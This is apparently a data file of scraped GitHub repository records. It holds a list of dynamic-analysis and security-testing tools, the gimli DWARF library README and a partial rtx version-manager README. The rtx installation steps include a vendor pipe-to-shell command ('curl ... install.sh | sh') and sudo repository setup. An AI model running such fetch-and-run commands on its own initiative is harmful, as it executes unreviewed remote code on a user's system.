\n\n\n- [CHAP](https://github.com/vmware/chap) \u2014 Analyzes un-instrumented ELF core files for leaks, memory growth, and corruption. It helps explain memory growth, can identify some forms of corruption, and supplements a debugger by giving the status of various memory locations.\n\n- [KLEE](https://github.com/klee/klee) \u2014 Symbolic virtual machine built on top of the LLVM compiler infrastructure.\n\n- [LDRA](https://ldra.com) :copyright: \u2014 A tool suite including dynamic analysis and test to various standards can ensure test coverage to 100% op-code, branch & decsion coverage.\n\n- [LLVM/Clang Sanitizers](https://github.com/google/sanitizers) \u2014 \n\n- [tis-interpreter](https://github.com/TrustInSoft/tis-interpreter) \u2014 An interpreter for finding subtle bugs in programs written in standard C.\n\n- [Valgrind](https://valgrind.org/) \u2014 An instrumentation framework for building dynamic analysis tools.\n\n\n
### Go
\n\n\n- [statsviz](https://github.com/arl/statsviz) \u2014 Instant live visualization of your Go application runtime statistics in the browser. It plots heap usage, MSpans/MCaches, Object counts, Goroutines and GC/CPU fraction.\n\n\n
### Java
\n\n\n- [Java PathFinder](https://github.com/javapathfinder/jpf-core) \u2014 An extensible software model checking framework for Java bytecode programs.\n\n- [Parasoft Jtest](https://www.parasoft.com/products/jtest) :copyright: \u2014 Jtest is an automated Java software testing and static analysis product that is made by Parasoft. The product includes technology for Data-flow analysis Unit test-case generation and execution, static analysis, regression testing, code coverage, and runtime error detection.\n\n\n
### JavaScript
\n\n\n- [Iroh.js](https://github.com/maierfelix/Iroh) \u2014 A dynamic code analysis tool for JavaScript. Iroh allows to record your code flow in realtime, intercept runtime informations and manipulate program behaviour on the fly.\n\n- [Jalangi2](https://github.com/Samsung/jalangi2) \u2014 Jalangi2 is a popular framework for writing dynamic analyses for JavaScript.\n\n\n
### PHP
\n\n\n- [Enlightn](https://www.laravel-enlightn.com/) \u2014 A static and dynamic analysis tool for Laravel applications that provides recommendations to improve the performance, security and code reliability of Laravel apps. Contains 120 automated checks.\n\n\n
### Python
\n\n\n- [CrossHair](https://github.com/pschanely/CrossHair) \u2014 Symbolic execution engine for testing Python contracts.\n\n- [icontract](https://github.com/Parquery/icontract) \u2014 Design-by-contract library supporting behavioral subtyping\nThere is also a wider tooling around the icontract library such as a linter (pyicontract-lint) and a plug-in for Sphinx (sphinx-icontract).\n\n- [Scalene](https://github.com/emeryberger/scalene) \u2014 A high-performance, high-precision CPU and memory profiler for Python\n\n- [typo](https://github.com/aldanor/typo) \u2014 Runtime Type Checking for Python 3.\n\n\n
### Ruby
\n\n\n- [suture](https://github.com/testdouble/suture) \u2014 A Ruby gem that helps you refactor your legacy code by the result of some old behavior with a new version.\n\n\n
### Rust
\n\n\n- [cargo-careful](https://github.com/RalfJung/cargo-careful) \u2014 Execute Rust code carefully, with extra checking along the way. It builds the standard library with debug assertions. Here are some of the checks this enables:\n * `get_unchecked` in slices performs bounds checks\n * `copy`, `copy_nonoverlapping`, and `write_bytes` check that pointers are aligned and non-null and (if applicable) non-overlapping\n * `{NonNull,NonZero*,...}::new_unchecked` checks that the value is valid\n * plenty of internal consistency checks in the collection types\n * `mem::zeroed` and the deprecated `mem::uninitialized` panic if the type does not allow that kind of initialization\n\n- [loom](https://github.com/tokio-rs/loom) \u2014 Concurrency permutation testing tool for Rust. It runs a test many times, permuting the possible concurrent executions of that test (see the sketch below).\n\n- [MIRI](https://github.com/rust-lang/miri) \u2014 An interpreter for Rust's mid-level intermediate representation, which can detect certain classes of undefined behavior like out-of-bounds memory accesses and use-after-free.\n\n- [puffin](https://github.com/EmbarkStudios/puffin) \u2014 Instrumentation profiler for Rust.\n\n- [rust-san](https://github.com/japaric/rust-san) \u2014 How to sanitize your Rust code with the built-in Rust dynamic analyzers.\n\n- [stuck](https://github.com/jonhoo/stuck) \u2014 Provides a visualization for quickly identifying common bottlenecks in running, asynchronous, and concurrent applications.\n\n\n
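To illustrate the permutation-testing idea behind loom, here is a minimal sketch of a loom test. It is not taken from any of the projects above; it assumes `loom` as a dev-dependency, and such tests are typically compiled behind a `--cfg loom` flag:

```rust
use loom::sync::Arc;
use loom::sync::atomic::{AtomicUsize, Ordering};
use loom::thread;

#[test]
fn concurrent_increments_are_seen() {
    // `loom::model` re-runs the closure once for every possible
    // interleaving of the spawned threads' synchronization operations.
    loom::model(|| {
        let counter = Arc::new(AtomicUsize::new(0));

        let handles: Vec<_> = (0..2)
            .map(|_| {
                let counter = counter.clone();
                thread::spawn(move || {
                    counter.fetch_add(1, Ordering::SeqCst);
                })
            })
            .collect();

        for handle in handles {
            handle.join().unwrap();
        }

        // This assertion is checked under every explored interleaving.
        assert_eq!(counter.load(Ordering::SeqCst), 2);
    });
}
```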
### SQL
\n\n\n- [WhiteHat Sentinel Dynamic](https://www.synopsys.com/software-integrity/security-testing/dast.html) :copyright: \u2014 Part of the WhiteHat Application Security Platform. Dynamic application security scanner that covers the OWASP Top 10.\n\n\n
### Visual Basic
\n\n\n- [VB Watch](https://www.aivosto.com/vbwatch.html) :copyright: \u2014 Profiler, Protector and Debugger for VB6. Profiler measures performance and test coverage. Protector implements robust error handling. Debugger helps monitor your executables.\n\n\n## Multiple languages\n\n\n- [CASR](https://crates.io/crates/casr) \u2014 Crash Analysis and Severity Report.\n\n- [Code Pulse](http://code-pulse.com/) \u2014 Code Pulse is a free real-time code coverage tool for penetration testing activities by OWASP and Code Dx ([GitHub](https://github.com/codedx/codepulse)).\n\n- [Sydr](https://sydr-fuzz.github.io/) :copyright: \u2014 Continuous Hybrid Fuzzing and Dynamic Analysis for Security Development Lifecycle.\n\n\n## Other\n\n\n\n
### API
\n\n\n- [Smartbear](https://smartbear.com/) :copyright: \u2014 Test automation and performance testing platform\n\n\n
### Binaries
\n\n\n- [angr](https://github.com/angr/angr) \u2014 Platform agnostic binary analysis framework from UCSB.\n\n- [BOLT](https://github.com/facebookincubator/BOLT) \u2014 Binary Optimization and Layout Tool - A linux command-line utility used for optimizing performance of binaries with profile guided permutation of linking to improve cache efficiency\n\n- [Dr. Memory](https://drmemory.org/) \u2014 Dr. Memory is a memory monitoring tool capable of identifying memory-related programming errors ([Github](https://github.com/DynamoRIO/drmemory)).\n\n- [DynamoRIO](http://www.dynamorio.org/) \u2014 Is a runtime code manipulation system that supports code transformations on any part of a program, while it executes.\n\n- [llvm-propeller](https://github.com/google/llvm-propeller) \u2014 Profile guided hot/cold function splitting to improve cache efficiency. An alternative to BOLT by Facebook\n\n- [Pin Tools](https://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool) \u2014 A dynamic binary instrumentation tool and a platform for creating analysis tools.\n\n- [TRITON](https://triton.quarkslab.com/) \u2014 Dynamic Binary Analysis for x86 binaries.\n\n\n
### Bytecode/IR
\n\n\n- [souper](https://github.com/google/souper) \u2014 optimize LLVM IR with SMT solvers\n\n\n
### Cloud
\n\n\n- [prowler](https://prowler.pro) \u2014 Prowler is an Open Source security tool to perform AWS and Azure security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.\nIt contains hundreds of controls covering CIS, PCI-DSS, ISO27001, GDPR, HIPAA, FFIEC, SOC2, AWS FTR, ENS and custom security frameworks.\n\n\n
### Containers
\n\n\n- [cadvisor](https://github.com/google/cadvisor) \u2014 Analyzes resource usage and performance characteristics of running containers.\n\n\n
### Laravel
\n\n\n- [Enlightn](https://www.laravel-enlightn.com/) \u2014 A static and dynamic analysis tool for Laravel applications that provides recommendations to improve the performance, security and code reliability of Laravel apps. Contains 120 automated checks.\n\n\n
### Security/DAST
\n\n\n- [AppScan Standard](https://www.hcltechsw.com/products/appscan) :copyright: \u2014 HCL's AppScan is a dynamic application security testing suite ([previously by IBM](https://newsroom.ibm.com/2018-12-06-HCL-Technologies-to-Acquire-Select-IBM-Software-Products-for-1-8B)).\n\n- [Enlightn](https://www.laravel-enlightn.com/) \u2014 A static and dynamic analysis tool for Laravel applications that provides recommendations to improve the performance, security and code reliability of Laravel apps. Contains 120 automated checks.\n\n- [WhiteHat Sentinel Dynamic](https://www.synopsys.com/software-integrity/security-testing/dast.html) :copyright: \u2014 Part of the WhiteHat Application Security Platform. Dynamic application security scanner that covers the OWASP Top 10.\n\n\n
### Web
\n\n\n- [Smartbear](https://smartbear.com/) :copyright: \u2014 Test automation and performance testing platform\n\n\n
### WebAssembly
\n\n\n- [Wasabi](https://github.com/danleh/wasabi) \u2014 Wasabi is a framework for writing dynamic analyses for WebAssembly, written in JavaScript.\n\n\n
### XML
\n\n\n- [WhiteHat Sentinel Dynamic](https://www.synopsys.com/software-integrity/security-testing/dast.html) :copyright: \u2014 Part of the WhiteHat Application Security Platform. Dynamic application security scanner that covers the OWASP Top 10.\n\n\n## License\n\n[![CC0](https://i.creativecommons.org/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/)\n\nTo the extent possible under law, [Matthias Endler](https://endler.dev) has waived all copyright and related or neighboring rights to this work.\nThe underlying source code used to format and display that content is licensed under the MIT license.\n\nTitle image [Designed by Freepik](http://www.freepik.com).", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gimli-rs/gimli", "link": "https://github.com/gimli-rs/gimli", "tags": ["dwarf", "rust", "cross-platform"], "stars": 667, "description": "A library for reading and writing the DWARF debugging format", "lang": "Rust", "repo_lang": "", "readme": "# `gimli`\n\n[![](https://img.shields.io/crates/v/gimli.svg) ![](https://img.shields.io/crates/d/gimli.svg)](https://crates.io/crates/gimli)\n[![](https://docs.rs/gimli/badge.svg)](https://docs.rs/gimli/)\n[![Build Status](https://github.com/gimli-rs/gimli/workflows/Rust/badge.svg)](https://github.com/gimli-rs/gimli/actions)\n[![Coverage Status](https://coveralls.io/repos/github/gimli-rs/gimli/badge.svg?branch=master)](https://coveralls.io/github/gimli-rs/gimli?branch=master)\n\n`gimli` is a library for reading and writing the\n[DWARF debugging format](https://dwarfstd.org/).\n\n* **Zero copy:** everything is just a reference to the original input buffer. No\n copies of the input data get made.\n\n* **Lazy:** you can iterate compilation units without parsing their\n contents. Parse only as many debugging information entry (DIE) trees as you\n iterate over. `gimli` also uses `DW_AT_sibling` references to avoid parsing a\n DIE's children to find its next sibling, when possible.\n\n* **Cross-platform:** `gimli` makes no assumptions about what kind of object\n file you're working with. The flipside to that is that it's up to you to\n provide an ELF loader on Linux or Mach-O loader on macOS.\n\n * Unsure which object file parser to use? Try the cross-platform\n [`object`](https://github.com/gimli-rs/object) crate. See the\n [`examples/`](./examples) directory for usage with `gimli`.\n\n
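To make the zero-copy, lazy style concrete, here is a small sketch of iterating units and DIEs. It is not from the gimli README; it stubs out section loading with empty slices, where a real program would supply each section's bytes from an object-file parser such as `object`:

```rust
use gimli::{Dwarf, EndianSlice, RunTimeEndian, SectionId};

fn list_unit_tags() -> Result<(), gimli::Error> {
    // Stub section loader: every DWARF section is empty here. A real program
    // would return the named section's bytes borrowed from the object file.
    let loader = |_id: SectionId| -> Result<EndianSlice<'static, RunTimeEndian>, gimli::Error> {
        Ok(EndianSlice::new(&[], RunTimeEndian::Little))
    };
    let dwarf = Dwarf::load(loader)?;

    // Unit headers are parsed lazily, one at a time...
    let mut units = dwarf.units();
    while let Some(header) = units.next()? {
        let unit = dwarf.unit(header)?;
        // ...and DIE trees only as you walk them, depth-first.
        let mut entries = unit.entries();
        while let Some((_depth_delta, entry)) = entries.next_dfs()? {
            println!("{}", entry.tag());
        }
    }
    Ok(())
}
```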
## Install\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\ngimli = \"0.27.2\"\n```\n\nThe minimum supported Rust version is 1.42.0.\n\n## Documentation\n\n* [Documentation on docs.rs](https://docs.rs/gimli/)\n\n* Example programs:\n\n * [A simple `.debug_info` parser](./examples/simple.rs)\n\n * [A simple `.debug_line` parser](./examples/simple_line.rs)\n\n * [A `dwarfdump` clone](./examples/dwarfdump.rs)\n\n * [An `addr2line` clone](https://github.com/gimli-rs/addr2line)\n\n * [`ddbug`](https://github.com/gimli-rs/ddbug), a utility giving insight into\n code generation by making debugging information readable.\n\n * [`dwprod`](https://github.com/fitzgen/dwprod), a tiny utility to list the\n compilers used to create each compilation unit within a shared library or\n executable (via `DW_AT_producer`).\n\n * [`dwarf-validate`](./examples/dwarf-validate.rs), a program to validate the\n integrity of some DWARF and its references between sections and compilation\n units.\n\n## License\n\nLicensed under either of\n\n * Apache License, Version 2.0 ([`LICENSE-APACHE`](./LICENSE-APACHE) or https://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([`LICENSE-MIT`](./LICENSE-MIT) or https://opensource.org/licenses/MIT)\n\nat your option.\n\n## Contribution\n\nSee [CONTRIBUTING.md](./CONTRIBUTING.md) for hacking.\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jdxcode/rtx", "link": "https://github.com/jdxcode/rtx", "tags": [], "stars": 668, "description": "Runtime Executor (asdf rust clone)", "lang": "Rust", "repo_lang": "", "readme": "\n# [rtx](https://github.com/jdxcode/rtx)\n\n[![Crates.io](https://img.shields.io/crates/v/rtx-cli.svg)](https://crates.io/crates/rtx-cli)\n[![License: MIT](https://img.shields.io/github/license/jdxcode/rtx)](https://github.com/jdxcode/rtx/blob/main/LICENSE)\n[![CI](https://github.com/jdxcode/rtx/actions/workflows/rtx.yml/badge.svg?branch=main)](https://github.com/jdxcode/rtx/actions/workflows/rtx.yml)\n[![Codecov](https://codecov.io/gh/jdxcode/rtx/branch/main/graph/badge.svg?token=XYH3Q0BOO0)](https://codecov.io/gh/jdxcode/rtx)\n[![Discord](https://img.shields.io/discord/1066429325269794907)](https://discord.gg/mABnUDvP57)\n\n_Polyglot runtime manager (asdf rust clone)_\n\n## 30 Second Demo\n\nThe following shows using rtx to install node, python, and jq into a project using a `.tool-versions` file.\n\n[![demo](./docs/demo.gif)](./docs/demo.gif)\n\n## Features\n\n- **asdf-compatible** - rtx is compatible with asdf plugins and `.tool-versions` files. It can be used as a drop-in replacement.\n- **Polyglot** - compatible with any language, so no more figuring out how nvm, nodenv, pyenv, etc work individually\u2014just use 1 tool.\n- **Fast** - rtx is written in Rust and is very fast. 20x-200x faster than asdf.\n- **No shims** - shims (used by asdf) cause problems, they break `which node`, and add overhead. We don't use them.\n- **Better UX** - asdf is full of strange UX decisions (like `asdf plugin add` but also `asdf install`). 
We've taken care to make rtx easy to use.\n- **Fuzzy matching and aliases** - no need to specify exact version numbers like with asdf.\n- **One command install** - No need to manually install each plugin, just run `rtx install` and it will install all the plugins you need.\n\n## Quickstart\n\nInstall rtx (other methods [here](#installation)):\n\n```sh-session\n$ curl https://rtx.pub/rtx-latest-macos-arm64 > ~/bin/rtx\n$ chmod +x ~/bin/rtx\n$ rtx --version\nrtx 1.10.1\n```\n\nHook rtx into your shell. This will automatically add `~/bin` to `PATH` if it isn't already.\n(choose one, and open a new shell session for the changes to take effect):\n\n```sh-session\n$ echo 'eval \"$(~/bin/rtx activate bash)\"' >> ~/.bashrc\n$ echo 'eval \"$(~/bin/rtx activate zsh)\"' >> ~/.zshrc\n$ echo '~/bin/rtx activate fish | source' >> ~/.config/fish/config.fish\n```\n\n> **Warning**\n>\n> If you use direnv, you will want to activate direnv _before_ rtx. There is also\n> an alternative way to use rtx inside of direnv, see [here](#direnv).\n\nInstall a runtime and set it as the default:\n\n```sh-session\n$ rtx install nodejs@18\n$ rtx global nodejs@18\n$ node -v\nv18.10.9\n```\n\n> **Note**\n>\n> `rtx install` is optional, `rtx global` will prompt to install the runtime if it's not\n> already installed. This is configurable in [`~/.config/rtx/config.toml`](#configuration).\n\n\n## About\n\nrtx is a tool for managing programming language and tool versions. For example, use this to install\na particular version of node.js and ruby for a project. Using `rtx activate`, you can have your\nshell automatically switch to the correct node and ruby versions when you `cd` into the project's\ndirectory. Other projects on your machine can use a different set of versions.\n\nrtx is inspired by [asdf](https://asdf-vm.com) and uses asdf's vast [plugin ecosystem](https://github.com/asdf-vm/asdf-plugins)\nunder the hood. However, it is _much_ faster than asdf and has a more friendly user experience.\nFor more on how rtx compares to asdf, [see below](#comparison-to-asdf). The goal of this project\nwas to create a better front-end to asdf.\n\nIt uses the same `.tool-versions` file that asdf uses. It's also compatible with idiomatic version\nfiles like `.node-version` and `.ruby-version`. See [Legacy Version Files](#legacy-version-files) below.\n\nCome chat about rtx on [discord](https://discord.gg/mABnUDvP57).\n\n### How it works\n\nrtx installs as a shell extension (e.g. `rtx activate zsh`) that sets the `PATH`\nenvironment variable to point your shell to the correct runtime binaries. When you `cd` into a\ndirectory containing a `.tool-versions` file, rtx will automatically activate the correct versions.\n\nEvery time your prompt starts it will call `rtx hook-env` to fetch new environment variables. This\nshould be very fast and it exits early if the directory wasn't changed or the `.tool-versions`\nfiles haven't been updated. On my machine this takes 4ms in the fast case, 14ms in the slow case. See [Performance](#performance) for more on this topic.\n\nUnlike asdf which uses shim files to dynamically locate runtimes when they're called, rtx modifies\n`PATH` ahead of time so the runtimes are called directly. This is not only faster since it avoids\nany overhead, but it also makes it so commands like `which node` work as expected.
This also\nmeans there isn't any need to run `asdf reshim` after installing new runtime binaries.\n\n### Common example commands\n\n rtx install nodejs@20.0.0 Install a specific version number\n rtx install nodejs@20.0 Install a fuzzy version number\n rtx local nodejs@20 Use node-20.x in current project\n rtx global nodejs@20 Use node-20.x as default\n\n rtx install nodejs Install the version specified in .tool-versions\n rtx local nodejs@latest Use latest node in current directory\n rtx global nodejs@system Use system node as default\n\n rtx x nodejs@20 -- node app.js Run `node app.js` with the PATH pointing to node-20.x\n\n## Installation\n\n> **Warning**\n>\n> Regardless of the installation method, when uninstalling rtx,\n> remove the `RTX_DATA_DIR` folder (usually `~/.local/share/rtx`) to fully clean up.\n\n### Standalone\n\nNote that it isn't necessary for `rtx` to be on `PATH`. If you run the activate script in your rc\nfile, rtx will automatically add itself to `PATH`.\n\n```sh-session\n$ curl https://rtx.pub/install.sh | sh\n```\n\n> **Note**\n>\n> There isn't currently an autoupdater in rtx. So if you use this method you'll need to remember\n> to fetch a new version manually for bug/feature fixes. I'm not sure if I'll ever add an autoupdater\n> because it might be disruptive to autoupdate to a major version that has breaking changes.\n\nor if you're allergic to `| sh`:\n\n```sh-session\n$ curl https://rtx.pub/rtx-latest-macos-arm64 > /usr/local/bin/rtx\n```\n\nIt doesn't matter where you put it. So use `~/bin`, `/usr/local/bin`, `~/.local/share/rtx/bin/rtx`\nor whatever.\n\nSupported architectures:\n\n- `x64`\n- `arm64`\n\nSupported platforms:\n\n- `macos`\n- `linux`\n\nIf you need something else, compile it with [cargo](#cargo).\n\n### Homebrew\n\nThere are 2 ways to install rtx with Homebrew. The recommended method is to use\nthe custom tap which will always contain the latest release.\n\n```sh-session\n$ brew install jdxcode/tap/rtx\n```\n\nAlternatively, you can use the built-in tap (homebrew-core), which will be updated\nonce Homebrew maintainers merge the PR for a new release:\n\n```sh-session\n$ brew install rtx\n```\n\n### Cargo\n\nBuild from source with Cargo.\n\n```sh-session\n$ cargo install rtx-cli\n```\n\nDo it faster with [cargo-binstall](https://github.com/cargo-bins/cargo-binstall):\n\n```sh-session\n$ cargo install cargo-binstall\n$ cargo binstall rtx-cli\n```\n\n### npm\n\nrtx is available on npm as precompiled binaries. This isn't a node.js package, just distributed\nvia npm.
It can be useful for JS projects that want to set up rtx via `package.json` or `npx`.\n\n```sh-session\n$ npm install -g @jdxcode/rtx\n```\n\nOr use npx if you just want to test it out for a single command without fully installing:\n\n```sh-session\n$ npx @jdxcode/rtx exec python@3.11 -- python some_script.py\n```\n\n### GitHub Releases\n\nDownload the latest release from [GitHub](https://github.com/jdxcode/rtx/releases).\n\n```sh-session\n$ curl -L https://github.com/jdxcode/rtx/releases/download/v1.10.1/rtx-v1.10.1-linux-x64.tar.xz | tar -xJv\n$ mv rtx/bin/rtx /usr/local/bin\n```\n\n### apt\n\nFor installation on Ubuntu/Debian:\n\n```sh-session\nwget -qO - https://rtx.pub/gpg-key.pub | gpg --dearmor | sudo tee /usr/share/keyrings/rtx-archive-keyring.gpg 1> /dev/null\necho \"deb [signed-by=/usr/share/keyrings/rtx-archive-keyring.gpg arch=amd64] https://rtx.pub/deb stable main\" | sudo tee /etc/apt/sources.list.d/rtx.list\nsudo apt update\nsudo apt install -y rtx\n```\n\n> **Warning**\n>\n> If you're on arm64 you'll need to run the following:\n> ```\n> echo \"deb [signed-by=/usr/share/keyrings/rtx-archive-keyring.gpg arch=arm64] https://rtx.pub/deb stable main\" | sudo tee /etc/apt/sources.list.d/rtx.list\n> ```\n\n### dnf\n\nFor Fedora, CentOS, Amazon Linux, RHEL and other dnf-based distributions:\n\n```sh-session\ndnf install -y dnf-plugins-core\ndnf config-manager --add-repo https://rtx.pub/rpm/rtx.repo\ndnf install -y rtx\n```\n\n### yum\n\n```sh-session\nyum install -y yum-utils\nyum-config-manager --add-repo https://rtx.pub/rpm/rtx.repo\nyum install -y rtx\n```\n\n### ~~apk~~ (coming soon)\n\nFor Alpine Linux:\n\n```sh-session\napk add rtx --repository=http://dl-cdn.alpinelinux.org/alpine/edge/testing/\n```\n\n### aur\n\nFor Arch Linux:\n\n```sh-session\ngit clone https://aur.archlinux.org/rtx.git\ncd rtx\nmakepkg -si\n```\n\n## Other Shells\n\n### Bash\n\n```sh-session\n$ echo 'eval \"$(rtx activate bash)\"' >> ~/.bashrc\n```\n\n### Fish\n\n```sh-session\n$ echo 'rtx activate fish | source' >> ~/.config/fish/config.fish\n```\n\n### Xonsh\n\nSince `.xsh` files are [not compiled](https://github.com/xonsh/xonsh/issues/3953) you may shave a bit off startup time by using a pure Python import: add the code below to, for example, `~/.config/xonsh/rtx.py` config file and `import rtx` it in `~/.config/xonsh/rc.xsh`:\n```xsh\nimport subprocess\nfrom pathlib import Path\nfrom xonsh.built_ins import XSH\n\nctx = XSH.ctx\nrtx_init = subprocess.run([Path('~/bin/rtx').expanduser(),'activate','xonsh'],capture_output=True,encoding=\"UTF-8\").stdout\nXSH.builtins.execx(rtx_init,'exec',ctx,filename='rtx')\n```\n\nOr continue to use `rc.xsh`/`.xonshrc`:\n```xsh\necho 'execx($(~/bin/rtx activate xonsh))' >> ~/.config/xonsh/rc.xsh # or ~/.xonshrc\n```\n\nGiven that `rtx` replaces both shell env `$PATH` and OS environ `PATH`, watch out that your configs don't have these two set differently (might throw `os.environ['PATH'] = xonsh.built_ins.XSH.env.get_detyped('PATH')` at the end of a config to make sure they match)\n\n### Something else?\n\nAdding a new shell is not hard at all since very little shell code is\nin this project.\n[See here](https://github.com/jdxcode/rtx/tree/main/src/shell) for how\nthe others are implemented. If your shell isn't currently supported\nI'd be happy to help you get yours integrated.\n\n## Configuration\n\n### `.tool-versions`\n\nThe `.tool-versions` file is used to specify the runtime versions for a project. An example of this\nis:\n\n```\nnodejs 20.0.0 # comments are allowed\nruby 3 # can be fuzzy version\nshellcheck latest # also supports \"latest\"\njq 1.6\n```\n\nCreate `.tool-versions` files manually, or use [`rtx local`](#rtx-local) to create them automatically.\nSee [the asdf docs](https://asdf-vm.com/manage/configuration.html#tool-versions) for more info on this file format.
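\n\nTo make the format concrete, here is a minimal, hypothetical Rust sketch of a parser for it (illustrative only, not rtx's actual implementation): each line names a tool followed by one or more versions, and `#` starts a comment.\n\n```rust\n/// Parse `.tool-versions` content into (tool, versions) pairs.\nfn parse_tool_versions(contents: &str) -> Vec<(String, Vec<String>)> {\n    contents\n        .lines()\n        .filter_map(|line| {\n            // Strip trailing comments and surrounding whitespace.\n            let line = line.split('#').next().unwrap_or(\"\").trim();\n            let mut parts = line.split_whitespace();\n            let tool = parts.next()?.to_string();\n            let versions: Vec<String> = parts.map(str::to_string).collect();\n            // A tool with no version is malformed; skip it in this sketch.\n            if versions.is_empty() {\n                None\n            } else {\n                Some((tool, versions))\n            }\n        })\n        .collect()\n}\n\nfn main() {\n    let file = \"nodejs 20.0.0 # comments are allowed\\nruby 3\\njq 1.6\\n\";\n    for (tool, versions) in parse_tool_versions(file) {\n        println!(\"{tool} -> {versions:?}\");\n    }\n}\n```\n\nNote how fuzzy versions like `ruby 3` are just ordinary tokens here; resolving them to a concrete install is a separate step.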
\n\n### Legacy version files\n\nrtx supports \"legacy version files\" just like asdf.\n\nIt's behind a config setting \"legacy_version_file\", but it's enabled by default (asdf defaults to disabled).\nYou can disable these with `rtx settings set legacy_version_file false`. There is a performance cost\nto parsing these, since the parsing is performed by the plugin in `bin/parse-version-file`. However\nthese are [cached](#cache-behavior) so it's not a huge deal. You may not even notice.\n\nThese are ideal for setting the runtime version of a project without forcing other developers to\nuse a specific tool like rtx/asdf.\n\nThey support aliases, which means you can (finally) have an `.nvmrc` file with `lts/hydrogen`\nand it will work in rtx _and_ nvm. This wasn't possible with asdf.\n\nHere are some of the supported legacy version files:\n\n| Plugin | \"Legacy\" (Idiomatic) Files |\n| --------- | -------------------------------------------------- |\n| crystal | `.crystal-version` |\n| elixir | `.exenv-version` |\n| golang | `.go-version`, `go.mod` |\n| java | `.java-version` |\n| nodejs | `.nvmrc`, `.node-version` |\n| python | `.python-version` |\n| ruby | `.ruby-version`, `Gemfile` |\n| terraform | `.terraform-version`, `.packer-version`, `main.tf` |\n| yarn | `.yvmrc` |\n\n> **Note**\n>\n> asdf calls these \"legacy version files\" so we do too. I think this is a bad name since it implies\n> that they shouldn't be used\u2014which is definitely not the case IMO. I prefer the term \"idiomatic\"\n> version files since they're version files not specific to asdf/rtx and can be used by other tools.\n> (`.nvmrc` being a notable exception, which is tied to a specific tool.)\n\n### Global config: `~/.config/rtx/config.toml`\n\nrtx can be configured in `~/.config/rtx/config.toml`. The following options are available (defaults shown):\n\n```toml\n# whether to prompt to install plugins and runtimes if they're not already installed\nmissing_runtime_behavior = 'prompt' # other options: 'ignore', 'warn', 'prompt', 'autoinstall'\n\n# plugins can read the version files used by other version managers (if enabled by the plugin)\n# for example, .nvmrc in the case of nodejs's nvm\nlegacy_version_file = true # enabled by default (different than asdf)\n\n# configure `rtx install` to always keep the downloaded archive\nalways_keep_download = false # deleted after install by default\n\n# configure how frequently (in minutes) to fetch updated plugin repository changes\n# this is updated whenever a new runtime is installed\n# (note: this isn't currently implemented but there are plans to add it: https://github.com/jdxcode/rtx/issues/128)\nplugin_autoupdate_last_check_duration = 10080 # (one week) set to 0 to disable updates\n\njobs = 4 # number of plugins or runtimes to install in parallel.
The default is `4`.\n\nverbose = false # see explanation under `RTX_VERBOSE`\n\n[alias.nodejs]\nmy_custom_node = '18' # makes `rtx install nodejs@my_custom_node` install node-18.x\n # this can also be specified in a plugin (see below in \"Aliases\")\n```\n\nThese settings can also be managed with `rtx settings ls|get|set|unset`.\n\n### Environment variables\n\nrtx can also be configured via environment variables. The following options are available:\n\n#### `RTX_MISSING_RUNTIME_BEHAVIOR`\n\nThis is the same as the `missing_runtime_behavior` config option in `~/.config/rtx/config.toml`.\n\n#### `RTX_DATA_DIR`\n\nThis is the directory where rtx stores its data. The default is `~/.local/share/rtx`.\n\n```sh-session\n$ RTX_MISSING_RUNTIME_BEHAVIOR=ignore rtx install nodejs@20\n$ RTX_NODEJS_VERSION=20 rtx exec -- node --version\n```\n\n#### `RTX_CONFIG_FILE`\n\nThis is the path to the config file. The default is `~/.config/rtx/config.toml`.\n(Or `$XDG_CONFIG_HOME/config.toml` if that is set)\n\n#### `RTX_DEFAULT_TOOL_VERSIONS_FILENAME`\n\nSet to something other than \".tool-versions\" to have rtx look for configuration with alternate names.\n\n#### `RTX_${PLUGIN}_VERSION`\n\nSet the version for a runtime. For example, `RTX_NODEJS_VERSION=20` will use nodejs@20.x regardless\nof what is set in `.tool-versions`.\n\n#### `RTX_LEGACY_VERSION_FILE`\n\nPlugins can read the version files used by other version managers (if enabled by the plugin),\nfor example, `.nvmrc` in the case of nodejs's nvm.\n\n#### `RTX_LOG_LEVEL=trace|debug|info|warn|error`\n\nCan also use `RTX_DEBUG=1`, `RTX_TRACE=1`, and `RTX_QUIET=1`. These adjust the log\noutput to the screen.\n\n#### `RTX_LOG_FILE=~/.rtx/rtx.log`\n\nOutput logs to a file.\n\n#### `RTX_LOG_FILE_LEVEL=trace|debug|info|warn|error`\n\nSame as `RTX_LOG_LEVEL` but for the log file output level. This is useful if you want\nto store the logs but not have them litter your display.\n\n#### `RTX_JOBS=1`\n\nSet the number of plugins or runtimes to install in parallel. The default is `4`.\n\n#### `RTX_VERBOSE=1`\n\nThis shows the installation output during `rtx install` and `rtx plugin install`.\nThis should likely be merged so it behaves the same as `RTX_DEBUG=1` and we don't have\ntwo configurations for the same thing, but for now it is its own config.\n\n#### `RTX_HIDE_OUTDATED_BUILD=1`\n\nIf a release is 12 months old, it will show a warning message every time it launches:\n\n```\nrtx has not been updated in over a year. Please update to the latest version.\n```\n\nYou likely do not want to be using rtx if it is that old. I'm doing this instead of\nautoupdating. If, for some reason, you want to stay on some old version, you can hide\nthis message with `RTX_HIDE_OUTDATED_BUILD=1`.\n\n## Aliases\n\nrtx supports aliasing the versions of runtimes. One use-case for this is to define aliases for LTS\nversions of runtimes. For example, you may want to specify `lts/hydrogen` as the version for nodejs@18.x.\nSo you can use the runtime with `nodejs lts/hydrogen` in `.tool-versions`.\n\nUser aliases can be created by adding an `alias.<PLUGIN>` section to `~/.config/rtx/config.toml`:\n\n```toml\n[alias.nodejs]\nmy_custom_18 = '18'\n```\n\nPlugins can also provide aliases via a `bin/list-aliases` script.
